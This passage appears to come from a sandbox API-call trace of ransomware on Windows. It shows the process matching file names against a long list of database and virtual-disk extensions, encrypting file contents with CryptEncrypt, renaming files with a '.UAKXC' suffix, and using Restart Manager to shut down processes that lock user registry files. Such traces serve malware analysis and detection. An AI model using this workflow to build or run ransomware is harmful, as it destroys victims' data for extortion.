(lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".trm") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".udb") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".udl") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".usr") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".v12") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vis") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vpd") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vvv") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".wdb") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".wmdb") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".wrk") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".xdb") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".xld") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".xmlff") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".abcddb") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".abs") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".abx") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accdw") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".adn") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".db2") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fm5") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".hjt") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".icg") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".icr") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".kdb") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".lut") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".maw") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mdn") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mdt") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vdi") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vhd") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmdk") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".pvm") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmem") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmsn") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmsd") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nvram") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmx") returned 0x0 [0141.470] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".raw") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".qcow2") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".subvol") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".bin") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vsv") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".avhd") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmrs") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vhdx") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".avdx") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".vmcx") returned 0x0 [0141.471] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".iso") returned 0x0 [0141.471] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.471] WriteFile (in: hFile=0x6c4, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.574] WriteFile (in: hFile=0x6c4, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.574] SetEndOfFile (hFile=0x6c4) returned 1 [0141.574] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.574] ReadFile (in: hFile=0x6c4, lpBuffer=0x4610000, nNumberOfBytesToRead=0x21dc, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x21dc, lpOverlapped=0x0) returned 1 [0141.584] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xffffde24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.584] WriteFile (in: hFile=0x6c4, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x21dc, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x21dc, lpOverlapped=0x0) returned 1 [0141.585] CloseHandle (hObject=0x6c4) returned 1 [0141.587] GetProcessHeap () returned 0xea0000 [0141.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.588] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\nslist.hxl" | out: lpString1="C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned="C:\\ProgramData\\Microsoft Help\\nslist.hxl" [0141.588] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\nslist.hxl.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\nslist.hxl.UAKXC" [0141.588] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl.UAKXC" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.uakxc")) returned 1 [0141.589] GetProcessHeap () returned 0xea0000 [0141.589] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.589] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0141.589] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2808 | out: hHeap=0xea0000) returned 1 [0141.589] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0141.589] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0141.589] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0141.590] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1")) returned 0x26 [0141.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.590] GetLastError () returned 0x20 [0141.591] RmStartSession () returned 0x0 [0143.362] LoadLibraryA (lpLibFileName="Rstrtmgr.dll") returned 0x753b0000 [0143.363] RmRegisterResources () returned 0x0 [0143.376] LoadLibraryA (lpLibFileName="Rstrtmgr.dll") returned 0x753b0000 [0143.376] RmGetList () returned 0xea [0143.762] GetProcessHeap () returned 0xea0000 [0143.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29c) returned 0xefe588 [0143.763] RmGetList () returned 0x0 [0144.154] GetCurrentProcess () returned 0xffffffff [0144.154] GetProcessId (Process=0xffffffff) returned 0xaec [0144.154] RmShutdown () returned 0x15e [0144.369] GetProcessHeap () returned 0xea0000 [0144.369] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe588 | out: hHeap=0xea0000) returned 1 [0144.369] RmEndSession () returned 0x0 [0144.371] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0144.371] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b00 | out: hHeap=0xea0000) returned 1 [0144.371] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0144.371] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0144.371] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0144.371] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms")) returned 0x26 [0144.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.372] GetLastError () returned 0x20 [0144.372] RmStartSession () returned 0x0 [0144.374] RmRegisterResources () returned 0x0 [0144.435] RmGetList () returned 0xea [0144.521] GetProcessHeap () returned 0xea0000 [0144.521] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29c) returned 0xef4e98 [0144.521] RmGetList () returned 0x0 [0144.617] GetCurrentProcess () returned 0xffffffff [0144.617] GetProcessId (Process=0xffffffff) returned 0xaec [0144.617] RmShutdown () returned 0x15e [0144.708] GetProcessHeap () returned 0xea0000 [0144.708] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef4e98 | out: hHeap=0xea0000) returned 1 [0144.708] RmEndSession () returned 0x0 [0144.709] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef0be0 | out: hHeap=0xea0000) returned 1 [0144.709] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ba0 | out: hHeap=0xea0000) returned 1 [0144.710] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0144.710] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0144.710] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0144.710] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log")) returned 0x22 [0146.021] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0146.022] GetLastError () returned 0x0 [0146.022] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=1024) returned 1 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".4dd") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".4dl") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accdb") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accdc") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accde") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accdr") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accdt") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accft") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".adb") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ade") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".adf") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".adp") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".arc") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ora") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".alf") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ask") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".btr") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".bdf") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".cat") returned 0x0 [0146.022] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".cdb") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ckp") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".cma") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".cpd") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dacpac") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dad") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dadiagrams") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".daschema") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".db") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".db-shm") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".db-wal") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".db3") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dbc") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dbf") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dbs") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dbt") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dbv") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dbx") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dcb") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dct") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dcx") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ddl") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dlis") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dp1") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dqy") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dsk") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dsn") returned 0x0 [0146.023] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dtsx") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".dxl") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".eco") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ecx") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".edb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".epim") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".exb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fcd") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fdb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fic") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fmp") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fmp12") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fmpsl") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fol") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fp3") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fp4") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fp5") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fp7") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fpt") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".frm") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".gdb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".grdb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".gwi") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".hdb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".his") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ib") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".idb") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ihx") returned 0x0 [0146.024] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".itdb") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".itw") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".jet") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".jtx") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".kdb") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".kexi") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".kexic") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".kexis") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".lgc") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".lwx") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".maf") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".maq") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mar") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mas") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mav") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mdb") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mdf") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mpd") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mrg") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mud") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mwb") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".myd") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ndf") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nnt") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nrmlib") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ns2") returned 0x0 [0146.025] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ns3") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".ns4") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nsf") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nv") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nv2") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nwdb") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nyf") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".odb") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".oqy") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".orx") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".owc") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".p96") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".p97") returned 0x0 